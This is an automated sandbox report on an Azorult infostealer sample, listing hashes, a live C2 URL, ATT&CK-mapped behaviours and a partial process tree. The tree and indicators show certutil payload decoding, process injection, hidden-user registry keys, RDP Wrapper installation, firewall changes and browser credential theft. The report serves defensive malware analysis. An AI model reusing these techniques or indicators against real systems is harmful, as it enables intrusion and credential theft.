azorult | 5f51907b9b458b61272ad82b98c712299cb770216917f27f31edf5d69bb68ffb

Analysis

max time kernel
130s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-12-2024 13:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
Size

3.6MB
MD5

9a3a57198f755e211d4be90a33320fcd
SHA1

4c97fb6c57008af22ded9e8e702aa2e9faabf467
SHA256

09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e
SHA512

49509e30e4bf202efb9127753dad111148bfdbb53ae5aa8f86a2aca4aa78729150e82e306505d367bd06b328f475c4753a334f5b58d21332743dd72cf6642990
SSDEEP

98304:x5aFNIJS6sXSRFAVU7RZUimDrW5++IH8JWCCtdBm3R:x5aFNH6+qRZUzrWAKJWCCtdBaR

Score

10^/10

azorult defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

azorult

http://430lodsposlok.store/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3028	net1.exe
2396	net.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
42	2156	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2760	powershell.exe
3840	powershell.exe
1064	powershell.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5020	netsh.exe
2896	netsh.exe
3760	netsh.exe
4680	netsh.exe
4780	netsh.exe
384	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 11 IoCs

pid	Process
112	rusk.com
1372	rusk.com
2552	rusk.com
3576	rusk.com
1660	rusk.com
1076	rusk.com
1864	RDPWInst.exe
4620	RDPWInst.exe
4352	RDPWInst.exe
1280	RDPWInst.exe
4308	RDPWInst.exe

Loads dropped DLL 3 IoCs

pid	Process
3432	svchost.exe
4024	svchost.exe
4672	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Deobfuscate/Decode Files or Information 1 TTPs 3 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
3760	certutil.exe
948	certutil.exe
4460	certutil.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\mghijkahcbhbiigclfbppfckfcpopaoo\9719\manifest.json	rusk.com

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
41	raw.githubusercontent.com
42	raw.githubusercontent.com
36	raw.githubusercontent.com
37	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/1076-59-0x0000000012CA0000-0x0000000012E94000-memory.dmp	autoit_exe
behavioral2/memory/1076-61-0x0000000012CA0000-0x0000000012E94000-memory.dmp	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\uOKINxfnlY = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\uOKINxfnlY = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\uOKINxfnlY = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 112 set thread context of 3576	112	rusk.com	93
PID 1372 set thread context of 1660	1372	rusk.com	95
PID 2552 set thread context of 1076	2552	rusk.com	96

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	rusk.com
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	rusk.com
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper	rusk.com
File opened for modification	C:\Program Files\RDP Wrapper\plink.exe	rusk.com
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	rusk.com
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\plink.exe	rusk.com
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	rusk.com

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2988	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
3304	timeout.exe
2148	timeout.exe
3024	timeout.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3932	schtasks.exe
1864	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	42	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1372	rusk.com
1372	rusk.com
112	rusk.com
112	rusk.com
2552	rusk.com
2552	rusk.com
1660	rusk.com
1660	rusk.com
2760	powershell.exe
2760	powershell.exe
3432	svchost.exe
3432	svchost.exe
3432	svchost.exe
3432	svchost.exe
4024	svchost.exe
4024	svchost.exe
4024	svchost.exe
4024	svchost.exe
4672	svchost.exe
4672	svchost.exe
4672	svchost.exe
4672	svchost.exe
3840	powershell.exe
3840	powershell.exe
1064	powershell.exe
1064	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeSecurityPrivilege	4656	WMIC.exe
Token: SeTakeOwnershipPrivilege	4656	WMIC.exe
Token: SeLoadDriverPrivilege	4656	WMIC.exe
Token: SeSystemProfilePrivilege	4656	WMIC.exe
Token: SeSystemtimePrivilege	4656	WMIC.exe
Token: SeProfSingleProcessPrivilege	4656	WMIC.exe
Token: SeIncBasePriorityPrivilege	4656	WMIC.exe
Token: SeCreatePagefilePrivilege	4656	WMIC.exe
Token: SeBackupPrivilege	4656	WMIC.exe
Token: SeRestorePrivilege	4656	WMIC.exe
Token: SeShutdownPrivilege	4656	WMIC.exe
Token: SeDebugPrivilege	4656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4656	WMIC.exe
Token: SeRemoteShutdownPrivilege	4656	WMIC.exe
Token: SeUndockPrivilege	4656	WMIC.exe
Token: SeManageVolumePrivilege	4656	WMIC.exe
Token: 33	4656	WMIC.exe
Token: 34	4656	WMIC.exe
Token: 35	4656	WMIC.exe
Token: 36	4656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeSecurityPrivilege	4656	WMIC.exe
Token: SeTakeOwnershipPrivilege	4656	WMIC.exe
Token: SeLoadDriverPrivilege	4656	WMIC.exe
Token: SeSystemProfilePrivilege	4656	WMIC.exe
Token: SeSystemtimePrivilege	4656	WMIC.exe
Token: SeProfSingleProcessPrivilege	4656	WMIC.exe
Token: SeIncBasePriorityPrivilege	4656	WMIC.exe
Token: SeCreatePagefilePrivilege	4656	WMIC.exe
Token: SeBackupPrivilege	4656	WMIC.exe
Token: SeRestorePrivilege	4656	WMIC.exe
Token: SeShutdownPrivilege	4656	WMIC.exe
Token: SeDebugPrivilege	4656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4656	WMIC.exe
Token: SeRemoteShutdownPrivilege	4656	WMIC.exe
Token: SeUndockPrivilege	4656	WMIC.exe
Token: SeManageVolumePrivilege	4656	WMIC.exe
Token: 33	4656	WMIC.exe
Token: 34	4656	WMIC.exe
Token: 35	4656	WMIC.exe
Token: 36	4656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4036	WMIC.exe
Token: SeSecurityPrivilege	4036	WMIC.exe
Token: SeTakeOwnershipPrivilege	4036	WMIC.exe
Token: SeLoadDriverPrivilege	4036	WMIC.exe
Token: SeSystemProfilePrivilege	4036	WMIC.exe
Token: SeSystemtimePrivilege	4036	WMIC.exe
Token: SeProfSingleProcessPrivilege	4036	WMIC.exe
Token: SeIncBasePriorityPrivilege	4036	WMIC.exe
Token: SeCreatePagefilePrivilege	4036	WMIC.exe
Token: SeBackupPrivilege	4036	WMIC.exe
Token: SeRestorePrivilege	4036	WMIC.exe
Token: SeShutdownPrivilege	4036	WMIC.exe
Token: SeDebugPrivilege	4036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4036	WMIC.exe
Token: SeRemoteShutdownPrivilege	4036	WMIC.exe
Token: SeUndockPrivilege	4036	WMIC.exe
Token: SeManageVolumePrivilege	4036	WMIC.exe
Token: 33	4036	WMIC.exe
Token: 34	4036	WMIC.exe
Token: 35	4036	WMIC.exe
Token: 36	4036	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4036	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3152 wrote to memory of 3760	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	82
PID 3152 wrote to memory of 3760	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	82
PID 3152 wrote to memory of 3760	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	82
PID 3152 wrote to memory of 948	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	84
PID 3152 wrote to memory of 948	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	84
PID 3152 wrote to memory of 948	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	84
PID 3152 wrote to memory of 4460	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	86
PID 3152 wrote to memory of 4460	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	86
PID 3152 wrote to memory of 4460	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	86
PID 3152 wrote to memory of 112	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	88
PID 3152 wrote to memory of 112	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	88
PID 3152 wrote to memory of 112	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	88
PID 3152 wrote to memory of 1372	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	89
PID 3152 wrote to memory of 1372	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	89
PID 3152 wrote to memory of 1372	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	89
PID 3152 wrote to memory of 2552	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	90
PID 3152 wrote to memory of 2552	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	90
PID 3152 wrote to memory of 2552	3152	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	90
PID 112 wrote to memory of 3576	112	rusk.com	93
PID 112 wrote to memory of 3576	112	rusk.com	93
PID 112 wrote to memory of 3576	112	rusk.com	93
PID 112 wrote to memory of 3576	112	rusk.com	93
PID 112 wrote to memory of 3576	112	rusk.com	93
PID 1372 wrote to memory of 1660	1372	rusk.com	95
PID 1372 wrote to memory of 1660	1372	rusk.com	95
PID 1372 wrote to memory of 1660	1372	rusk.com	95
PID 1372 wrote to memory of 1660	1372	rusk.com	95
PID 1372 wrote to memory of 1660	1372	rusk.com	95
PID 2552 wrote to memory of 1076	2552	rusk.com	96
PID 2552 wrote to memory of 1076	2552	rusk.com	96
PID 2552 wrote to memory of 1076	2552	rusk.com	96
PID 2552 wrote to memory of 1076	2552	rusk.com	96
PID 2552 wrote to memory of 1076	2552	rusk.com	96
PID 1076 wrote to memory of 1412	1076	rusk.com	97
PID 1076 wrote to memory of 1412	1076	rusk.com	97
PID 1076 wrote to memory of 1412	1076	rusk.com	97
PID 1412 wrote to memory of 1988	1412	cmd.exe	99
PID 1412 wrote to memory of 1988	1412	cmd.exe	99
PID 1412 wrote to memory of 1988	1412	cmd.exe	99
PID 1076 wrote to memory of 3892	1076	rusk.com	100
PID 1076 wrote to memory of 3892	1076	rusk.com	100
PID 1076 wrote to memory of 3892	1076	rusk.com	100
PID 3892 wrote to memory of 3932	3892	cmd.exe	102
PID 3892 wrote to memory of 3932	3892	cmd.exe	102
PID 3892 wrote to memory of 3932	3892	cmd.exe	102
PID 1076 wrote to memory of 3548	1076	rusk.com	103
PID 1076 wrote to memory of 3548	1076	rusk.com	103
PID 1076 wrote to memory of 3548	1076	rusk.com	103
PID 3548 wrote to memory of 3280	3548	cmd.exe	105
PID 3548 wrote to memory of 3280	3548	cmd.exe	105
PID 3548 wrote to memory of 3280	3548	cmd.exe	105
PID 1076 wrote to memory of 2260	1076	rusk.com	106
PID 1076 wrote to memory of 2260	1076	rusk.com	106
PID 1076 wrote to memory of 2260	1076	rusk.com	106
PID 2260 wrote to memory of 1864	2260	cmd.exe	108
PID 2260 wrote to memory of 1864	2260	cmd.exe	108
PID 2260 wrote to memory of 1864	2260	cmd.exe	108
PID 1076 wrote to memory of 1008	1076	rusk.com	109
PID 1076 wrote to memory of 1008	1076	rusk.com	109
PID 1076 wrote to memory of 1008	1076	rusk.com	109
PID 1008 wrote to memory of 3160	1008	cmd.exe	111
PID 1008 wrote to memory of 3160	1008	cmd.exe	111
PID 1008 wrote to memory of 3160	1008	cmd.exe	111
PID 3160 wrote to memory of 4656	3160	cmd.exe	112

C:\Users\Admin\AppData\Local\Temp\09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
"C:\Users\Admin\AppData\Local\Temp\09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3152
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode utru.com grom
  2⤵
  - Manipulates Digital Signatures
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:3760
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode sfera.com hyr
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:948
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode vobo.com kij
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:4460
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com" grom
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:112
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3576
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com" hyr
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1372
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com"
    3⤵
    - Executes dropped EXE
    - Drops Chrome extension
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1660
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
